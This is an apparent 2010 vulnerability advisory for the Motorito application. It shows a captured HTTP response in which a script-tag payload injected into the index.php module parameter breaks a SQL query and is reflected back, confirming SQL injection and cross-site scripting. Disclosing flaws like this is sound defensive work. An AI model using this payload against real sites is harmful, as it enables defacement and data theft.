This bug was found using CENTOS and the last release of Motorito with Apache 2.2.3 and PHP 5.1.6. To exploit the vulnerability it is only needed to use the version 1.0 of the HTTP protocol to interact with the application, and it is possible to check that the variables of the module index.php are not properly filtered.
HTTP/1.1 200 OK
Content-Length: 361
Date: Fri, 05 Feb 2010 08:53:16 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.1.6
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0,
pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html
</td></tr></table><b>Database error:</b> Invalid SQL: SELECT parentID FROM sis_menus WHERE module='>"'><script>alert(4135)</script>' <br>
<b>MySQL Error</b>: 1064 (You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '><script>alert(4135)</script>'' at line 1)<br>
Session halted.
Public defacement, confidential data leakage, and database server compromise can result from these attacks. Client systems can also be targeted, and complete compromise of these client systems is also possible.
Disclosure Timeline:
March 30, 2010: Initial release
